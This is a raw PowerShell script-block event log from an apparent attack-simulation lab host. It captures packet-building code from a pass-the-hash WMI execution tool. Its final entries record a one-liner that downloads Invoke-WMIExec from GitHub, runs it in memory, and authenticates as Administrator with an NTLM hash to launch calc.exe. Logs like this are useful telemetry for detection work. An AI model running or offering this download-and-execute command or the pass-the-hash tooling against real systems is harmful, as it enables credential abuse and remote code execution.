$packet_RPCBind.Add("InterfaceVer2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor2",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) $packet_RPCBind.Add("TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x02,0x00)) $packet_RPCBind.Add("NumTransItems3",[Byte[]](0x01)) $packet_RPCBind.Add("Unknown4",[Byte[]](0x00)) $packet_RPCBind.Add("Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) $packet_RPCBind.Add("InterfaceVer3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("InterfaceVerMinor3",[Byte[]](0x00,0x00)) $packet_RPCBind.Add("TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x04)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } if($packet_call_ID -eq 3) { $packet_RPCBind.Add("AuthType",[Byte[]](0x0a)) $packet_RPCBind.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCBind.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCBind.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCBind.Add("ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) $packet_RPCBind.Add("MessageType",[Byte[]](0x01,0x00,0x00,0x00)) $packet_RPCBind.Add("NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) $packet_RPCBind.Add("CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) $packet_RPCBind.Add("OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) } return $packet_RPCBind } function New-PacketRPCAUTH3 { param([Byte[]]$packet_NTLMSSP) [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length)[0,1] [Byte[]]$packet_RPC_length = [System.BitConverter]::GetBytes($packet_NTLMSSP.Length + 28)[0,1] $packet_RPCAuth3 = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAuth3.Add("Version",[Byte[]](0x05)) $packet_RPCAuth3.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAuth3.Add("PacketType",[Byte[]](0x10)) $packet_RPCAuth3.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAuth3.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAuth3.Add("FragLength",$packet_RPC_length) $packet_RPCAuth3.Add("AuthLength",$packet_NTLMSSP_length) $packet_RPCAuth3.Add("CallID",[Byte[]](0x03,0x00,0x00,0x00)) $packet_RPCAuth3.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAuth3.Add("AuthType",[Byte[]](0x0a)) $packet_RPCAuth3.Add("AuthLevel",[Byte[]](0x02)) $packet_RPCAuth3.Add("AuthPadLength",[Byte[]](0x00)) $packet_RPCAuth3.Add("AuthReserved",[Byte[]](0x00)) $packet_RPCAuth3.Add("ContextID",[Byte[]](0x00,0x00,0x00,0x00)) $packet_RPCAuth3.Add("NTLMSSP",$packet_NTLMSSP) return $packet_RPCAuth3 } function New-PacketRPCRequest { param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) if($packet_auth_length -gt 0) { $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 } [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) [Byte[]]$packet_frag_length = $packet_write_length[0,1] [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length)[0,1] $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCRequest.Add("Version",[Byte[]](0x05)) $packet_RPCRequest.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketType",[Byte[]](0x00)) $packet_RPCRequest.Add("PacketFlags",$packet_flags) $packet_RPCRequest.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCRequest.Add("FragLength",$packet_frag_length) $packet_RPCRequest.Add("AuthLength",$packet_auth_length) $packet_RPCRequest.Add("CallID",$packet_call_ID) $packet_RPCRequest.Add("AllocHint",$packet_alloc_hint) $packet_RPCRequest.Add("ContextID",$packet_context_ID) $packet_RPCRequest.Add("Opnum",$packet_opnum) if($packet_data.Length) { $packet_RPCRequest.Add("Data",$packet_data) } return $packet_RPCRequest } function New-PacketRPCAlterContext { param([Byte[]]$packet_assoc_group,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_interface_UUID) $packet_RPCAlterContext = New-Object System.Collections.Specialized.OrderedDictionary $packet_RPCAlterContext.Add("Version",[Byte[]](0x05)) $packet_RPCAlterContext.Add("VersionMinor",[Byte[]](0x00)) $packet_RPCAlterContext.Add("PacketType",[Byte[]](0x0e)) $packet_RPCAlterContext.Add("PacketFlags",[Byte[]](0x03)) $packet_RPCAlterContext.Add("DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) $packet_RPCAlterContext.Add("FragLength",[Byte[]](0x48,0x00)) $packet_RPCAlterContext.Add("AuthLength",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("CallID",$packet_call_ID) $packet_RPCAlterContext.Add("MaxXmitFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("MaxRecvFrag",[Byte[]](0xd0,0x16)) $packet_RPCAlterContext.Add("AssocGroup",$packet_assoc_group) $packet_RPCAlterContext.Add("NumCtxItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown",[Byte[]](0x00,0x00,0x00)) $packet_RPCAlterContext.Add("ContextID",$packet_context_ID) $packet_RPCAlterContext.Add("NumTransItems",[Byte[]](0x01)) $packet_RPCAlterContext.Add("Unknown2",[Byte[]](0x00)) $packet_RPCAlterContext.Add("Interface",$packet_interface_UUID) $packet_RPCAlterContext.Add("InterfaceVer",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("InterfaceVerMinor",[Byte[]](0x00,0x00)) $packet_RPCAlterContext.Add("TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) $packet_RPCAlterContext.Add("TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) return $packet_RPCAlterContext } function New-PacketNTLMSSPVerifier { param([Int]$packet_auth_padding,[Byte[]]$packet_auth_level,[Byte[]]$packet_sequence_number) $packet_NTLMSSPVerifier = New-Object System.Collections.Specialized.OrderedDictionary if($packet_auth_padding -eq 4) { $packet_NTLMSSPVerifier.Add("AuthPadding",[B3385642a-bc19-4a13-9528-112eb91fc99f 4104152150x0716769Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11{[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username Administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}d99b7806-9bb6-4cdc-866b-8fde0682a37d 4104152150x0716767Microsoft-Windows-PowerShell/Operationalmswin-server.attackrange.local11& {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username Administrator -Hash ead0cc57ddaae50d876b7dd6386fa9c7 -Command calc.exe}43afc814-1d7e-43fb-b761-4c7a4273fb1b